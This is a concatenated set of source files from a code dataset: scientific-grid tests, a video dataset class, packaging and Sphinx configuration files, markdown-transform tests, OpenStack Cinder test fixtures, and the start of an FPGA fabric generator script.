ds, periodic, _ = all_datasets
grid = Grid(ds, periodic=periodic)
for axis_name in grid.axes.keys():
try:
ax_periodic = axis_name in periodic
except TypeError:
ax_periodic = periodic
axis = Axis(ds, axis_name, periodic=ax_periodic)
bcs = [None] if ax_periodic else ["fill", "extend"]
for varname in ["data_c", "data_g"]:
for boundary in bcs:
da_interp = grid.interp(ds[varname], axis_name, boundary=boundary)
da_interp_ax = axis.interp(ds[varname], boundary=boundary)
assert da_interp.equals(da_interp_ax)
da_diff = grid.diff(ds[varname], axis_name, boundary=boundary)
da_diff_ax = axis.diff(ds[varname], boundary=boundary)
assert da_diff.equals(da_diff_ax)
if boundary is not None:
da_cumsum = grid.cumsum(ds[varname], axis_name, boundary=boundary)
da_cumsum_ax = axis.cumsum(ds[varname], boundary=boundary)
assert da_cumsum.equals(da_cumsum_ax)
@pytest.mark.parametrize("func", ["interp", "max", "min", "diff", "cumsum"])
@pytest.mark.parametrize("periodic", ["True", "False", ["X"], ["Y"], ["X", "Y"]])
@pytest.mark.parametrize(
"boundary",
[
"fill",
# "extrapolate", # do we not support extrapolation anymore?
"extend",
{"X": "fill", "Y": "extend"},
{"X": "extend", "Y": "fill"},
],
)
def test_multi_axis_input(all_datasets, func, periodic, boundary):
ds, periodic_unused, expected_unused = all_datasets
grid = Grid(ds, periodic=periodic)
axes = list(grid.axes.keys())
for varname in ["data_c", "data_g"]:
serial = ds[varname]
for axis in axes:
boundary_axis = boundary
if isinstance(boundary, dict):
boundary_axis = boundary[axis]
serial = getattr(grid, func)(serial, axis, boundary=boundary_axis)
full = getattr(grid, func)(ds[varname], axes, boundary=boundary)
xr.testing.assert_allclose(serial, full)
def test_grid_dict_input_boundary_fill(nonperiodic_1d):
"""Test axis kwarg input functionality using dict input"""
ds, _, _ = nonperiodic_1d
grid_direct = Grid(ds, periodic=False, boundary="fill", fill_value=5)
grid_dict = Grid(ds, periodic=False, boundary={"X": "fill"}, fill_value={"X": 5})
assert grid_direct.axes["X"].fill_value == grid_dict.axes["X"].fill_value
assert grid_direct.axes["X"].boundary == grid_dict.axes["X"].boundary
def test_invalid_boundary_error():
ds = datasets["1d_left"]
with pytest.raises(ValueError):
Axis(ds, "X", boundary="bad")
with pytest.raises(ValueError):
Grid(ds, boundary="bad")
with pytest.raises(ValueError):
Grid(ds, boundary={"X": "bad"})
with pytest.raises(ValueError):
Grid(ds, boundary={"X": 0})
with pytest.raises(ValueError):
Grid(ds, boundary=0)
def test_invalid_fill_value_error():
ds = datasets["1d_left"]
with pytest.raises(ValueError):
Axis(ds, "X", fill_value="x")
with pytest.raises(ValueError):
Grid(ds, fill_value="bad")
with pytest.raises(ValueError):
Grid(ds, fill_value={"X": "bad"})
@pytest.mark.parametrize(
"funcname",
[
"diff",
"interp",
"min",
"max",
"integrate",
"average",
"cumsum",
"cumint",
"derivative",
],
)
@pytest.mark.parametrize("gridtype", ["B", "C"])
def test_keep_coords(funcname, gridtype):
ds, coords, metrics = datasets_grid_metric(gridtype)
ds = ds.assign_coords(yt_bis=ds["yt"], xt_bis=ds["xt"])
grid = Grid(ds, coords=coords, metrics=metrics)
func = getattr(grid, funcname)
for axis_name in grid.axes.keys():
result = func(ds.tracer, axis_name)
base_coords = list(result.dims)
augmented_coords = [
c for c in ds.tracer.coords if set(ds[c].dims).issubset(result.dims)
]
if funcname in ["integrate", "average"]:
assert set(result.coords) == set(base_coords + augmented_coords)
else:
assert set(result.coords) == set(base_coords)
#
if funcname not in ["integrate", "average"]:
result = func(ds.tracer, axis_name, keep_coords=False)
assert set(result.coords) == set(base_coords)
#
result = func(ds.tracer, axis_name, keep_coords=True)
assert set(result.coords) == set(base_coords + augmented_coords)
def test_boundary_kwarg_same_as_grid_constructor_kwarg():
ds = datasets["2d_left"]
grid1 = Grid(ds, periodic=False)
grid2 = Grid(ds, periodic=False, boundary={"X": "fill", "Y": "fill"})
actual1 = grid1.interp(ds.data_g, ("X", "Y"), boundary={"X": "fill", "Y": "fill"})
actual2 = grid2.interp(ds.data_g, ("X", "Y"))
xr.testing.assert_identical(actual1, actual2)
@pytest.mark.parametrize(
"metric_axes,metric_name",
[("X", "dx_t"), ("Y", "dy_ne"), (["Y", "X"], "dy_n")],
)
def test_interp_like(metric_axes, metric_name):
ds, coords, _ = datasets_grid_metric("C")
grid = Grid(ds, coords=coords)
grid.set_metrics(metric_axes, metric_name)
metric_available = grid._metrics.get(frozenset(metric_axes), None)
metric_available = metric_available[0]
interp_metric = grid.interp_like(metric_available, ds.u)
test_metric = grid.interp(ds[metric_name], metric_axes)
xr.testing.assert_equal(interp_metric, test_metric)
xr.testing.assert_allclose(interp_metric, test_metric)
@pytest.mark.parametrize(
"var_name,like_name,var_axes",
[
("tracer", "u", "X"),
],
)
def test_interp_like_var(var_name, like_name, var_axes):
ds, coords, metrics = datasets_grid_metric("C")
grid = Grid(ds, coords=coords, metrics=metrics)
interp_var = grid.interp_like(ds[var_name], ds[like_name])
test_var = grid.interp(ds[var_name], var_axes)
xr.testing.assert_equal(interp_var, test_var)
xr.testing.assert_allclose(interp_var, test_var)
| 34.366748 | 88 | 0.64115 |
4a1f452c2c4c38185c394af33b0463bb03fd5fd1 | 3,864 | py | Python | mmaction/datasets/rawframe_dataset_contrastive.py | lambert-x/video_semisup | 8ff44343bb34485f8ad08d50ca4d8de22e122c1d | [
"Apache-2.0"
] | null | null | null | mmaction/datasets/rawframe_dataset_contrastive.py | lambert-x/video_semisup | 8ff44343bb34485f8ad08d50ca4d8de22e122c1d | [
"Apache-2.0"
] | null | null | null | mmaction/datasets/rawframe_dataset_contrastive.py | lambert-x/video_semisup | 8ff44343bb34485f8ad08d50ca4d8de22e122c1d | [
"Apache-2.0"
] | null | null | null | import copy
import numpy as np
import torch
from .pipelines import Compose
from .rawframe_dataset import RawframeDataset
from .builder import DATASETS
@DATASETS.register_module()
class RawframeDataset_Contrastive(RawframeDataset):
"""Rawframe dataset for action recognition.
Unlabeled: return strong/weak augmented pair
Only valid in training time, not test-time behavior
Args:
ann_file (str): Path to the annotation file.
pipeline_weak (list[dict | callable]): A sequence of data transforms (shared augmentation).
pipeline_strong (list[dict | callable]): A sequence of data transforms (strong augmentation).
pipeline_format (list[dict | callable]): A sequence of data transforms (post-processing, for formating).
data_prefix (str): Path to a directory where videos are held.
Default: None.
test_mode (bool): Store True when building test or validation dataset.
Default: False.
filename_tmpl (str): Template for each filename.
Default: 'img_{:05}.jpg'.
with_offset (bool): Determines whether the offset information is in
ann_file. Default: False.
multi_class (bool): Determines whether it is a multi-class
recognition dataset. Default: False.
num_classes (int): Number of classes in the dataset. Default: None.
modality (str): Modality of data. Support 'RGB' only.
det_file (str): Path to the human box detection result file.
cls_file (str): Path to the ImageNet classification result file.
"""
def __init__(self,
ann_file,
pipeline,
contrast_clip_num,
pipeline_appearance=None,
data_prefix=None,
test_mode=False,
filename_tmpl='img_{:05}.jpg',
with_offset=False,
multi_class=False,
num_classes=None,
start_index=1,
modality='RGB'):
assert modality == 'RGB'
super().__init__(ann_file, pipeline, data_prefix, test_mode, filename_tmpl, with_offset,
multi_class, num_classes, start_index, modality)
if pipeline_appearance is not None:
self.pipeline_appearance = Compose(pipeline_appearance)
else:
self.pipeline_appearance = None
self.contrast_clip_num = contrast_clip_num
def prepare_train_frames(self, idx):
"""Prepare the frames for training given the index."""
results = copy.deepcopy(self.video_infos[idx])
results['filename_tmpl'] = self.filename_tmpl
results['modality'] = self.modality
results['start_index'] = self.start_index
# output = dict()
# Step1: Foward with the base labeled pipeline
results_contrast_all = []
for i in range(self.contrast_clip_num):
results_single_clip = self.pipeline(copy.deepcopy(results))
results_contrast_all.append(results_single_clip)
# if self.pipeline_appearance is not None:
# results_appearance = self.pipeline_appearance(copy.deepcopy(results_main))
# output = self.pipeline_format(results_main)
# output['imgs_appearance'] = results_appearance['imgs']
# else:
# output = self.pipeline_format(results_main)
output = dict()
for key in ['imgs', 'label', 'imgs_diff']:
output[key] = torch.cat([result[key] for result in results_contrast_all], dim=0)
return output
def prepare_test_frames(self, idx):
raise NotImplementedError
def evaluate(self,
results,
metrics='top_k_accuracy',
topk=(1, 5),
logger=None):
raise NotImplementedError
| 40.25 | 112 | 0.631211 |
4a1f4668f9f5fa13041040bae456e10f161942a9 | 873 | py | Python | setup.py | maryletteroa/biodemo | 470dccac212505cbd9791b6e24889070ef1247c4 | [
"MIT"
] | null | null | null | setup.py | maryletteroa/biodemo | 470dccac212505cbd9791b6e24889070ef1247c4 | [
"MIT"
] | null | null | null | setup.py | maryletteroa/biodemo | 470dccac212505cbd9791b6e24889070ef1247c4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
from distutils.core import setup
LONG_DESCRIPTION = \
'''The program reads one or more input FASTA files.
For each file it computes a variety of statistics, and then
prints a summary of the statistics as output.
The goal is to provide a solid foundation for new bioinformatics command line tools,
and is an ideal starting place for new projects.'''
setup(
name='biodemo',
version='0.1.0.0',
author='Marylette Roa',
author_email='[email protected]',
packages=['biodemo'],
package_dir={'biodemo': 'biodemo'},
entry_points={
'console_scripts': ['biodemo = biodemo.biodemo:main']
},
url='https://github.com/GITHUB_USERNAME/biodemo',
license='LICENSE',
description=('A prototypical bioinformatics command line tool'),
long_description=(LONG_DESCRIPTION),
install_requires=["biopython"],
)
| 29.1 | 84 | 0.710195 |
4a1f478a9c6fbf18528c8d86b1cf22d210ca1677 | 7,890 | py | Python | docs/conf.py | chen23/f5-azure-saca | 5edb5a95defadc702d1360e44862d50149b8c57d | [
"MIT"
] | null | null | null | docs/conf.py | chen23/f5-azure-saca | 5edb5a95defadc702d1360e44862d50149b8c57d | [
"MIT"
] | null | null | null | docs/conf.py | chen23/f5-azure-saca | 5edb5a95defadc702d1360e44862d50149b8c57d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
#
# BEGIN CONFIG
# ------------
#
# REQUIRED: Your class/lab name
classname = "F5 Azure SACA"
# OPTIONAL: The URL to the GitHub Repository for this class
github_repo = "https://github.com/f5devcentral/f5-azure-saca"
# OPTIONAL: Google Analytics
# googleanalytics_id = 'UA-85156643-4'
#
# END CONFIG
# ----------
import os
import sys
import time
import re
import pkgutil
import string
sys.path.insert(0, os.path.abspath('.'))
import f5_sphinx_theme
year = time.strftime("%Y")
eventname = "%s Hands-on Guide" % (year)
rst_prolog = """
.. |classname| replace:: %s
.. |classbold| replace:: **%s**
.. |classitalic| replace:: *%s*
.. |ltm| replace:: Local Traffic Manager
.. |adc| replace:: Application Delivery Controller
.. |gtm| replace:: Global Traffic Manager
.. |dns| replace:: DNS
.. |asm| replace:: Application Security Manager
.. |afm| replace:: Advanced Firewall Manager
.. |apm| replace:: Access Policy Manager
.. |pem| replace:: Policy Enforcement Manager
.. |ipi| replace:: IP Intelligence
.. |iwf| replace:: iWorkflow
.. |biq| replace:: BIG-IQ
.. |bip| replace:: BIG-IP
.. |aiq| replace:: APP-IQ
.. |ve| replace:: Virtual Edition
.. |icr| replace:: iControl REST API
.. |ics| replace:: iControl SOAP API
.. |f5| replace:: F5 Networks
.. |f5i| replace:: F5 Networks, Inc.
.. |year| replace:: %s
""" % (classname,
classname,
classname,
year)
if 'github_repo' in locals() and len(github_repo) > 0:
rst_prolog += """
.. |repoinfo| replace:: The content contained here leverages a full DevOps CI/CD
pipeline and is sourced from the GitHub repository at %s.
Bugs and Requests for enhancements can be made using by
opening an Issue within the repository.
""" % (github_repo)
else:
rst_prolog += ".. |repoinfo| replace:: \ \n"
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
on_snops = os.environ.get('SNOPS_ISALIVE', None) == 'True'
print "on_rtd = %s" % on_rtd
print "on_snops = %s" % on_snops
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinxjp.themes.basicstrap',
'sphinx.ext.todo',
'sphinx.ext.autosectionlabel'
]
if 'googleanalytics_id' in locals() and len(googleanalytics_id) > 0:
extensions += ['sphinxcontrib.googleanalytics']
googleanalytics_enabled = True
eggs_loader = pkgutil.find_loader('sphinxcontrib.spelling')
found = eggs_loader is not None
if found:
extensions += ['sphinxcontrib.spelling']
spelling_lang='en_US'
spelling_word_list_filename='../wordlist'
spelling_show_suggestions=True
spelling_ignore_pypi_package_names=False
spelling_ignore_wiki_words=True
spelling_ignore_acronyms=True
spelling_ignore_python_builtins=True
spelling_ignore_importable_modules=True
spelling_filters=[]
source_parsers = {
'.md': 'recommonmark.parser.CommonMarkParser',
}
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
source_suffix = ['.rst', '.md']
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = classname
copyright = u'2017, F5 Networks, Inc.'
author = u'F5 Networks, Inc.'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u''
# The full version, including alpha/beta/rc tags.
release = u''
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_emit_warnings = True
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'f5_sphinx_theme'
html_theme_path = f5_sphinx_theme.get_html_theme_path()
html_sidebars = {'**': ['searchbox.html', 'localtoc.html', 'globaltoc.html','relations.html']}
html_theme_options = {
'site_name': 'Community Training Classes & Labs',
'next_prev_link': True
}
def setup(app):
app.add_stylesheet('css/f5_agility_theme.css')
if on_rtd:
templates_path = ['_templates']
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
cleanname = re.sub('\W+','',classname)
# Output file base name for HTML help builder.
htmlhelp_basename = cleanname + 'doc'
# -- Options for LaTeX output ---------------------------------------------
front_cover_image = 'front_cover'
back_cover_image = 'back_cover'
front_cover_image_path = os.path.join('_static', front_cover_image + '.png')
back_cover_image_path = os.path.join('_static', back_cover_image + '.png')
latex_additional_files = [front_cover_image_path, back_cover_image_path]
template = string.Template(open('preamble.tex').read())
latex_contents = r"""
\frontcoverpage
\contentspage
"""
backcover_latex_contents = r"""
\backcoverpage
"""
latex_elements = {
'papersize': 'letterpaper',
'pointsize': '10pt',
'fncychap': r'\usepackage[Bjornstrup]{fncychap}',
'preamble': template.substitute(eventname=eventname,
project=project,
author=author,
frontcoverimage=front_cover_image,
backcoverimage=back_cover_image),
'tableofcontents': latex_contents,
'printindex': backcover_latex_contents
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, '%s.tex' % cleanname, u'%s Documentation' % classname,
u'F5 Networks, Inc.', 'manual', True),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, cleanname.lower(), u'%s Documentation' % classname,
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, classname, u'%s Documentation' % classname,
author, classname, classname,
'Training'),
]
| 30.114504 | 94 | 0.676806 |
4a1f47a21c9acc1d62a0685376bc229c25b2811b | 1,411 | py | Python | test/test_markdown_transform_to_gfm.py | scop/pymarkdown | 562ba8f7857d99ba09e86e42de5a37ec6d9b2c30 | [
"MIT"
] | 20 | 2021-01-14T17:39:09.000Z | 2022-03-14T08:35:22.000Z | test/test_markdown_transform_to_gfm.py | scop/pymarkdown | 562ba8f7857d99ba09e86e42de5a37ec6d9b2c30 | [
"MIT"
] | 304 | 2020-08-15T23:24:00.000Z | 2022-03-31T23:34:03.000Z | test/test_markdown_transform_to_gfm.py | scop/pymarkdown | 562ba8f7857d99ba09e86e42de5a37ec6d9b2c30 | [
"MIT"
] | 3 | 2021-08-11T10:26:26.000Z | 2021-11-02T20:41:27.000Z | """
https://github.github.com/gfm/#lists
"""
import pytest
from pymarkdown.markdown_token import (
EndMarkdownToken,
MarkdownToken,
MarkdownTokenClass,
)
from pymarkdown.transform_to_gfm import TransformToGfm
@pytest.mark.gfm
def test_gfm_bad_token():
"""
Test to ensure that a bad markdown token asserts an error.
"""
# Arrange
transformer = TransformToGfm()
tokens_to_test = [
MarkdownToken("bad", MarkdownTokenClass.INLINE_BLOCK),
]
# Act
try:
transformer.transform(tokens_to_test)
assert False, "should have failed"
except AssertionError as this_exception:
captured_exception = this_exception
# Assert
assert (
str(captured_exception)
== "Markdown token type <class 'pymarkdown.markdown_token.MarkdownToken'> not supported."
)
@pytest.mark.gfm
def test_gfm_bad_end_token():
"""
Test to ensure that a bad markdown end token asserts an error.
"""
# Arrange
transformer = TransformToGfm()
tokens_to_test = [
EndMarkdownToken("bad", "", None, "hi", False),
]
# Act
try:
transformer.transform(tokens_to_test)
assert False, "should have failed"
except AssertionError as this_exception:
captured_exception = this_exception
# Assert
assert str(captured_exception) == "Markdown token end type bad not supported."
| 23.131148 | 97 | 0.673281 |
4a1f486efca49905579a71bad170d7031e9f84b2 | 6,670 | py | Python | cinder/tests/fixtures.py | arunvinodqmco/cinder | 62cb72c6890e458427ba0601646b186b7b36dc01 | [
"Apache-2.0"
] | 571 | 2015-01-01T17:47:26.000Z | 2022-03-23T07:46:36.000Z | cinder/tests/fixtures.py | arunvinodqmco/cinder | 62cb72c6890e458427ba0601646b186b7b36dc01 | [
"Apache-2.0"
] | 37 | 2015-01-22T23:27:04.000Z | 2021-02-05T16:38:48.000Z | cinder/tests/fixtures.py | arunvinodqmco/cinder | 62cb72c6890e458427ba0601646b186b7b36dc01 | [
"Apache-2.0"
] | 841 | 2015-01-04T17:17:11.000Z | 2022-03-31T12:06:51.000Z | # Copyright 2016 IBM Corp.
# Copyright 2017 Rackspace Australia
# Copyright 2018 Michael Still and Aptira
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Fixtures for Cinder tests."""
import logging as std_logging
import os
import warnings
import fixtures
from oslo_config import cfg
from oslo_policy import policy as oslo_policy
from oslo_privsep import daemon as privsep_daemon
import cinder.policy
CONF = cfg.CONF
_TRUE_VALUES = ('True', 'true', '1', 'yes')
class NullHandler(std_logging.Handler):
"""custom default NullHandler to attempt to format the record.
Used in conjunction with
log_fixture.get_logging_handle_error_fixture to detect formatting errors in
debug level logs without saving the logs.
"""
def handle(self, record):
self.format(record)
def emit(self, record):
pass
def createLock(self):
self.lock = None
class StandardLogging(fixtures.Fixture):
"""Setup Logging redirection for tests.
There are a number of things we want to handle with logging in tests:
* Redirect the logging to somewhere that we can test or dump it later.
* Ensure that as many DEBUG messages as possible are actually
executed, to ensure they are actually syntactically valid (they
often have not been).
* Ensure that we create useful output for tests that doesn't
overwhelm the testing system (which means we can't capture the
100 MB of debug logging on every run).
To do this we create a logger fixture at the root level, which
defaults to INFO and create a Null Logger at DEBUG which lets
us execute log messages at DEBUG but not keep the output.
To support local debugging OS_DEBUG=True can be set in the
environment, which will print out the full debug logging.
There are also a set of overrides for particularly verbose
modules to be even less than INFO.
"""
def setUp(self):
super(StandardLogging, self).setUp()
# set root logger to debug
root = std_logging.getLogger()
root.setLevel(std_logging.INFO)
# supports collecting debug level for local runs
if os.environ.get('OS_DEBUG') in _TRUE_VALUES:
level = std_logging.DEBUG
else:
level = std_logging.INFO
# Collect logs
fs = '%(asctime)s %(levelname)s [%(name)s] %(message)s'
self.logger = self.useFixture(
fixtures.FakeLogger(format=fs, level=None))
# TODO(sdague): why can't we send level through the fake
# logger? Tests prove that it breaks, but it's worth getting
# to the bottom of.
root.handlers[0].setLevel(level)
if level > std_logging.DEBUG:
# Just attempt to format debug level logs, but don't save them
handler = NullHandler()
self.useFixture(fixtures.LogHandler(handler, nuke_handlers=False))
handler.setLevel(std_logging.DEBUG)
# Don't log every single DB migration step
std_logging.getLogger(
'migrate.versioning.api').setLevel(std_logging.WARNING)
# At times we end up calling back into main() functions in
# testing. This has the possibility of calling logging.setup
# again, which completely unwinds the logging capture we've
# created here. Once we've setup the logging in the way we want,
# disable the ability for the test to change this.
def fake_logging_setup(*args):
pass
self.useFixture(
fixtures.MonkeyPatch('oslo_log.log.setup', fake_logging_setup))
class WarningsFixture(fixtures.Fixture):
"""Filters out warnings during test runs."""
def setUp(self):
super(WarningsFixture, self).setUp()
# NOTE(sdague): Make deprecation warnings only happen once. Otherwise
# this gets kind of crazy given the way that upstream python libs use
# this.
warnings.simplefilter('once', DeprecationWarning)
# NOTE(sdague): this remains an unresolved item around the way
# forward on is_admin, the deprecation is definitely really premature.
warnings.filterwarnings(
'ignore',
message='Policy enforcement is depending on the value of is_admin.'
' This key is deprecated. Please update your policy '
'file to use the standard policy values.')
self.addCleanup(warnings.resetwarnings)
class UnHelperfulClientChannel(privsep_daemon._ClientChannel):
def __init__(self, context):
raise Exception('You have attempted to start a privsep helper. '
'This is not allowed in the gate, and '
'indicates a failure to have mocked your tests.')
class PrivsepNoHelperFixture(fixtures.Fixture):
"""A fixture to catch failures to mock privsep's rootwrap helper.
If you fail to mock away a privsep'd method in a unit test, then
you may well end up accidentally running the privsep rootwrap
helper. This will fail in the gate, but it fails in a way which
doesn't identify which test is missing a mock. Instead, we
raise an exception so that you at least know where you've missed
something.
"""
def setUp(self):
super(PrivsepNoHelperFixture, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'oslo_privsep.daemon.RootwrapClientChannel',
UnHelperfulClientChannel))
class PolicyFixture(fixtures.Fixture):
"""Load the live policy for tests.
A base policy fixture that starts with the assumption that you'd
like to load and enforce the shipped default policy in tests.
"""
def setUp(self):
super().setUp()
cinder.policy.reset()
# Suppress deprecation warnings for unit tests.
cinder.policy.init(suppress_deprecation_warnings=True)
self.addCleanup(cinder.policy.reset)
def set_rules(self, rules, overwrite=True):
policy = cinder.policy._ENFORCER
policy.set_rules(oslo_policy.Rules.from_dict(rules),
overwrite=overwrite)
| 35.860215 | 79 | 0.68006 |
4a1f48db441b71b50c50da329db7d935ba10476d | 503 | py | Python | luna/gateware/interface/serdes_phy/__init__.py | shrine-maiden-heavy-industries/luna | 6e737ea004d64c0b81de13e68657fecb45f93c1b | [
"BSD-3-Clause"
] | null | null | null | luna/gateware/interface/serdes_phy/__init__.py | shrine-maiden-heavy-industries/luna | 6e737ea004d64c0b81de13e68657fecb45f93c1b | [
"BSD-3-Clause"
] | null | null | null | luna/gateware/interface/serdes_phy/__init__.py | shrine-maiden-heavy-industries/luna | 6e737ea004d64c0b81de13e68657fecb45f93c1b | [
"BSD-3-Clause"
] | null | null | null | #
# This file is part of LUNA.
#
# Copyright (c) 2020 Great Scott Gadgets <[email protected]>
# Copyright (c) 2020 Florent Kermarrec <[email protected]>
#
# Code adapted from ``litex`` and ``usb3_pipe``.
# SPDX-License-Identifier: BSD-3-Clause
""" SerDes-based USB3 PIPE PHY. """
#
# Quick-use aliases
#
__all__ = ['ECP5SerDesPIPE', 'XC7GTPSerDesPIPE', 'XC7GTXSerDesPIPE']
from .ecp5 import ECP5SerDesPIPE
from .xc7_gtp import XC7GTPSerDesPIPE
from .xc7_gtx import XC7GTXSerDesPIPE
| 26.473684 | 69 | 0.741551 |
4a1f498f8e228ba4d301b9865fcc19076299891c | 236,438 | py | Python | fabric_sky130_v1_generator/fabric_gen_nobuf.py | FPGA-Research-Manchester/FabricGenerator | f58178ecc0818ae61f9c04b515a4a713b7c82ce0 | [
"Apache-2.0"
] | 5 | 2020-12-25T00:43:15.000Z | 2021-02-01T17:45:35.000Z | fabric_sky130_v1_generator/fabric_gen_nobuf.py | FPGA-Research-Manchester/FabricGenerator | f58178ecc0818ae61f9c04b515a4a713b7c82ce0 | [
"Apache-2.0"
] | 1 | 2020-12-25T00:43:08.000Z | 2020-12-25T00:43:08.000Z | fabric_sky130_v1_generator/fabric_gen_nobuf.py | FPGA-Research-Manchester/FabricGenerator | f58178ecc0818ae61f9c04b515a4a713b7c82ce0 | [
"Apache-2.0"
] | null | null | null | #!/bin/env python3
# Copyright 2021 University of Manchester
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from array import array
import re
import sys
from contextlib import redirect_stdout
from io import StringIO
import math
import os
import numpy
import configparser
import pickle
import csv
from fasm import * #Remove this line if you do not have the fasm library installed and will not be generating a bitstream
#Default parameters (will be overwritten if defined in fabric between 'ParametersBegin' and 'ParametersEnd'
#Parameters = [ 'ConfigBitMode', 'FrameBitsPerRow' ]
ConfigBitMode = 'FlipFlopChain'
FrameBitsPerRow = 32
MaxFramesPerCol = 20
Package = 'use work.my_package.all;'
GenerateDelayInSwitchMatrix = '100' # time in ps - this is needed for simulation as a fabric configuration can result in loops crashing the simulator
MultiplexerStyle = 'custom' # 'custom': using our hard-coded MUX-4 and MUX-16; 'generic': using standard generic RTL code
SwitchMatrixDebugSignals = True # generate switch matrix select signals (index) which is useful to verify if bitstream matches bitstream
# TILE field aliases
direction = 0
source_name = 1
X_offset = 2
Y_offset = 3
destination_name = 4
wires = 5
# bitstream mapping aliases
frame_name = 0
frame_index = 1
bits_used_in_frame = 2
used_bits_mask = 3
ConfigBits_ranges = 4
# columns where VHDL file is specified
VHDL_file_position=1
TileType_position=1
# BEL prefix field (needed to allow multiple instantiations of the same BEL inside the same tile)
BEL_prefix=2
# MISC
All_Directions = ['NORTH', 'EAST', 'SOUTH', 'WEST']
# Given a fabric array description, return all uniq cell types
def GetCellTypes( list ):
# make the fabric flat
flat_list = []
for sublist in list:
for item in sublist:
flat_list.append(item)
output = []
for item in flat_list:
if item not in output:
output.append(item)
# we use the keyword 'NULL' for padding tiles that we don't return
if ('NULL' in output):
output.remove('NULL')
return output;
# take a list and remove all items that contain a # and remove empty lines
def RemoveComments( list ):
output = []
for line in list:
templine = []
marker = False # we use this marker to remember if we had an '#' element before
for item in line:
if item.startswith('#'):
marker = True
if not (item.startswith('#') or marker == True):
# marker = True
templine.append(item)
if item == '':
templine.remove('')
if templine != []:
output.append(templine)
return output;
def GetFabric( list, filter = 'Fabric' ):
templist = []
# output = []
marker = False
for sublist in list:
if filter+'End' in sublist: # was FabricEnd
marker = False
if marker == True:
templist.append(sublist)
# we place this conditional after the append such that the 'FabricBegin' will be kicked out
if filter+'Begin' in sublist: # was FabricBegin
marker = True
return RemoveComments(templist)
def GetTileFromFile( list, TileType ):
templist = []
# output = []
marker = False
for sublist in list:
if ('EndTILE' in sublist):
marker = False
if ('TILE' in sublist) and (TileType in sublist):
marker = True
if marker == True:
templist.append(sublist)
# we place this conditional after the append such that the 'FabricBegin' will be kicked out
# if ('TILE' in sublist) and (type in sublist):
# if ('TILE' in sublist) and (TileType in sublist):
# marker = True
return RemoveComments(templist)
def PrintTileComponentPort (tile_description, entity, direction, file ):
print('\t-- ',direction, file=file)
for line in tile_description:
if line[0] == direction:
print('\t\t',line[source_name], '\t: out \tSTD_LOGIC_VECTOR( ', end='', file=file)
print(((abs(int(line[X_offset]))+abs(int(line[Y_offset])))*int(line[wires]))-1, end='', file=file)
print(' downto 0 );', end='', file=file)
print('\t -- wires: ', line[wires], file=file)
for line in tile_description:
if line[0] == direction:
print('\t\t',line[destination_name], '\t: in \tSTD_LOGIC_VECTOR( ', end='', file=file)
print(((abs(int(line[X_offset]))+abs(int(line[Y_offset])))*int(line[wires]))-1, end='', file=file)
print(' downto 0 );', end='', file=file)
print('\t -- wires: ', line[wires], file=file)
return
def replace(string, substitutions):
substrings = sorted(substitutions, key=len, reverse=True)
regex = re.compile('|'.join(map(re.escape, substrings)))
return regex.sub(lambda match: substitutions[match.group(0)], string)
def PrintComponentDeclarationForFile(VHDL_file_name, file ):
ConfigPortUsed = 0 # 1 means is used
VHDLfile = [line.rstrip('\n') for line in open(VHDL_file_name)]
templist = []
marker = False
# for item in VHDLfile:
# print(item)
for line in VHDLfile:
# NumberOfConfigBits:0 means no configuration port
if re.search('NumberOfConfigBits', line, flags=re.IGNORECASE):
# NumberOfConfigBits appears, so we may have a config port
ConfigPortUsed = 1
# but only if the following is not true
if re.search('NumberOfConfigBits:0', line, flags=re.IGNORECASE):
ConfigPortUsed = 0
if marker == True:
print(re.sub('entity', 'component', line, flags=re.IGNORECASE), file=file)
if re.search('^entity', line, flags=re.IGNORECASE):
# print(str.replace('^entity', line))
